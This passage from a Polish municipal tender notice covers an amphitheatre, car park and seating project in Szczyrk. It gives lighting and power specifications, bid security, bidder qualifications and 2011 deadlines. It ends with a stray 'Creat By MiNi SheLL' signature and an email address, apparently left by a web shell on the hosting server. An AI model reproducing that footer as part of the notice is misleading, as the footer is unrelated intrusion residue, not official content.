Oświetlenie parkingu, ul. Wypoczynkowej oraz terenu wokół amfiteatru zaprojektowano na słupach drewnianych o wysokości 3,5 m od poziomu terenu z lampami parkowymi ze źródłami światła MH 70W 830 np. MOOVE AS PALO. Na _plecach widowni oświetlenie projektuje się zabudowę opraw tego samego typu, mocowanych na elewacji widowni. Dla doświetlenia całego placu za widownią oraz parkingu przewidziano zamontowanie reflektorów ze źródłami światła MH 250W 830 np. Reflektory doświetlające teren  amfiteatru zamontowane będą na obudowach kanałów wentylacyjnych widowni (sektor A) na wysokości 6m, natomiast reflektory doświetlające parking na słupach 6m w miejscach wskazanych na planie sytuacyjnym.
Dodatkowo na placu amfiteatru przewidziano oświetlenie liniowe montowane w posadzce np. typu LEDIA LL OD. Oświetlenie liniowe zasilane będzie napięciem stałym 24Vpoprzez zasilacze typu SP-200 zamontowane w szafach sterowniczych zlokalizowanych w miejscach wskazanych na planie sytuacyjnym. Szafy sterownicze PZ_LED_2 i PZ_LED_3 wykonać należy jako wolnostojące, szafę PZ_LED_1 zabudować obok szafy sterowania oświetlenia SO-2 wpomieszczeniu gospodarczym pod widownią w sektorze A. Szczegółowe schematy zasilania oświetlenia LED przedstawione zostały na rysunku nr E-5.

d) Zasilanie oświetlenia
Zgodnie z warunkami przyłączenia WP_R4_417783_09 dla zasilania oświetlenia terenu obok amfiteatru wykorzystać należy przyłącze wykonane dla zasilania pomieszczeń pod widownią. Zgodnie z ww. warunkami przyłączenia ENION wymieni istniejące złącze kablowe ZKT-1 nr 5114 zabudowane na ścianie amfiteatru na nowe ZKT-3 obok którego zabuduje złącze pomiarowe półpośrednie.
W zakresie przyłączenia realizowane przez inwestora pozostaje wykonanie wewnętrznej linii zasilającej rozdzielnię zlokalizowaną w pomieszczeniu pod widownią kablem YAKY 4x35mm2 . 
W zakresie przyłączenia realizowane przez inwestora pozostaje wykonanie wewnętrznej linii zasilającej rozdzielnię zlokalizowaną w pomieszczeniu pod widownią kablem YAKY 4x35mm2 ułożonym w ziemi. Układ połączeń wewnętrznej linii zasilającej rozdzielnicę opisany jest na schemacie instalacji wewnętrznej pomieszczeń pod widownią.
Skrzynkę sterowania oświetlenia zewnętrznego zabudować należy obok rozdzielnicy RA (pomieszczenie gospodarcze w sektorze A) i zasilić przewodami 5xLgY 10 dobudowując w rozdzielnicy dodatkowy obwód.

Dane ogólne
1. Ul. Wypoczynkowa, parking - szafa SO-1.
a) Napięcie sieci elektrycznej - 230,
b) Moc zainstalowana: 1,28 kW,
c) Sieć zasilająca pracuje w systemie TT,
d) Zasilanie szafy wykonane przewodami 3 x LgY 6mm2 w RVKL 47 p.t. z rozdzielni obwodowej magazynu,
e) Zasilanie obwodów oświetleniowych wykonane kablem YKY 4x6mm2,
f) Ochrona od porażeń - ochrona przeciwporażeniowa dodatkowa przez zastosowanie bezpieczników i samoczynnego wyłączenia zasilania,
2. Teren amfiteatru - szafa SO-2.
a) Napięcie sieci elektrycznej - 230_400V,
b) Moc zainstalowana: 9 kW,
c) Sieć zasilająca pracuje w systemie TT,
d) Szafę sterowniczą zabudować w pomieszczeniu gospodarczym pod widownią     w sektorze A i zasilić przewodami 5 x LgY 10mm2 w RVKL 47 p.t. z rozdzielnicy obwodowej zabudowanej w tym samym pomieszczeniu,
e) Zasilanie obwodów oświetleniowych wykonane kablem YKY 4x6mm2,
f) Ochrona od porażeń - ochrona przeciwporażeniowa dodatkowa przez zastosowanie bezpieczników i samoczynnego wyłączenia zasilania,
Szczegółowe schematy zasilania szaf S01 i S02 oraz poszczególnych obwodów oświetleniowych przedstawione zostały na rysunkach nr E-4, E-5 i E-6.

e) Sterowanie oświetleniem
Oświetlenie będzie sterowane przy pomocy zegara sterującego CPA 3.0 zabudowanego standardowo w szafie oświetleniowej. Przewidziano również zainstalowanie w szafie czujnika zmierzchowego, który może współpracować z w_w zegarem astronomicznym. Oświetlenie liniowe, a także kinkiety i reflektory zamontowane na widowni sterowane będą dodatkowo ręcznie poprzez łączniki krzywkowe PI, P2 (kinkiety) oraz P3, P4 (LED) zamontowane w pomieszczeniu technicznym pod widownią, co da możliwość załączania w_w oświetlenia jedynie podczas organizowania imprez masowych.
7. Wykonanie organizacji ruchu na czas prowadzenia robót budowlanych  oraz  organizacji docelowej .
8. Wykonanie  dokumentacji powykonawczej .
9. Pokrycie ewentualnych kosztów odbiorów robót, inspektorów działających  z ramienia  gestorów sieci podlegających przebudowie. 
10. Z uwagi na kalendarz imprez dopuszcza się rozpoczęcie robót budowlanych na terenie amfiteatru od 08 sierpnia 2011r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.70-8, 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.20.00.00-9, 45.11.12.00-0, 45.22.33.00-9, 45.23.21.00-3, 45.23.13.00-8, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości : 102 000,00 zł (słownie: sto dwa tysiące złotych 00/100 ) 
2. Wadium należy wnieść w terminie do dnia 29.04.2011r. do godz. 10:00 w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego: 
Bank Spółdzielczy w Radziechowach-Wieprzu konto: 58 8140 0009 0043 8656 2000 0030 z dopiskiem wadium na : Zagospodarowania terenu wokół Amfiteatru wraz z parkingiem oraz budowa widowni Amfiteatru  .
3. Potwierdzeniem wniesienia wadium w pieniądzu będzie kserokopia przelewu (wpłaty) załączona do oferty.
4. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym terminie znajduje się na koncie Zamawiającego.
5. Wadium w pozostałych formach należy składać w kasie Urzędu Miejskiego  w Szczyrku, ul. Beskidzka 4, pokój nr 24 w terminie przed upływem składania ofert.
6. Zamawiający zwraca wadium na zasadach określonych w art. 46  Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia  - w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:
a)  co najmniej jedną robotę budowlaną polegającą na budowie budynku widowni /trybun wraz z instalacjami i urządzeniami technicznymi o kubaturze minimum 1500m3  bądź roboty budowlanej o podobnym charakterze tj. budowie budynku użyteczności publicznej wraz z instalacjami i urządzeniami technicznymi o kubaturze minimum 2000 m3 ;
b) co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, remoncie placu (rynku) lub przestrzeni publicznych o podobnym charakterze takich jak  skwer, aleja, deptak, park o powierzchni min. 3500 m2 o nawierzchni z kostki betonowej lub kamiennej wraz  z odwodnieniem (kanalizacją deszczową);
c) co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, remoncie parkingu, placu, drogi , deptaka o powierzchni 1500m2 o nawierzchni asfaltowej wraz  z odwodnieniem (kanalizacją deszczową) 
Wykonawca  załączy co najmniej jeden dokument potwierdzający, że roboty została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia art. 22 Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone:  
-osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia    do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, oraz co najmniej 5-letnie doświadczenie w pełnieniu funkcji kierownika budowy, w tym przy realizacji jednego zamówienia polegającego na budowie budynku widowni/trybun wraz z instalacjami i urządzeniami technicznymi  o kubaturze minimum 1500m3  bądź roboty budowlanej o podobnym charakterze tj. budowie budynku wraz z instalacjami i urządzeniami technicznymi o kubaturze minimum 2000m3, oraz budowie, przebudowie remoncie placu (rynku) lub przestrzeni publicznych o podobnym charakterze takich jak  skwer, aleja, deptak, park  o powierzchni min. 3500 m2 o nawierzchni z kostki betonowej lub kamiennej wraz  z odwodnieniem (kanalizacją deszczową),
-osobą, która będzie pełnić funkcje kierownika robót, posiadająca uprawnienia  do kierowania robotami budowlanymi  w specjalności drogowej bez ograniczeń, oraz co najmniej 5 letnie doświadczenie w pełnieniu funkcji kierownika budowy lub robót, w tym przy realizacji m.in. jednego zamówienia  polegającego na budowie, przebudowie, remoncie parkingu, placu, drogi , deptaka o powierzchni 1500m2  o nawierzchni asfaltowej wraz z odwodnieniem (kanalizacją deszczową) 
-osobą, która będzie pełnić funkcje kierownika robót, posiadająca uprawnienia  do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych   i elektroenergetycznych bez ograniczeń .
-osobą, która będzie pełnić funkcje kierownika robót, posiadająca uprawnienia  do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  bez ograniczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaże dostęp do  środków finansowych niezbędnych na realizację zamówienia   określonych na kwotę co najmniej 4.000.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie w trybie art. 22 oraz oświadczenie w związku z art.26 ust. 2b</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany  oraz określił warunki takiej zmiany.
2.Zamawiający przewiduje możliwość zmiany umowy. 
1) Zmiana  przewidzianego w umowie terminu zakończenia robót w przypadku:  
a) zmiany spowodowanej warunkami atmosferycznymi, w szczególności 
- klęski żywiołowej ,
- warunków atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych (potwierdzone wpisem inspektora nadzoru) 
b) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, lub terenowymi, w szczególności istnienie nie zinwentaryzowanych  lub błędnie zinwentaryzowanych obiektów budowlanych  lub urządzeń. 
c) wstrzymania robót przez  Zamawiającego,
d) konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,
2) Zmiana sposobu realizacji robót  na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
- koniecznością realizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdy zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy .
- niedostępnością na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub w specyfikacji technicznej wykonania i odbioru robót  spowodowanych zaprzestaniem produkcji  lub wycofania z rynku tych materiałów i urządzeń    
3. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami .
- zmianą sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
- w następstwie wprowadzenia zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, w tym przepisów dotyczących realizacji  inwestycji ze środków unijnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.szczyrk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szczyrku
ul. Beskidzka 4
43-370 Szczyrk
pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 10:00, miejsce: Urząd Miejski w Szczyrku
ul. Beskidzka 4
43-370 Szczyrk
Dziennik Podawczy pok. 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinasowane z Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com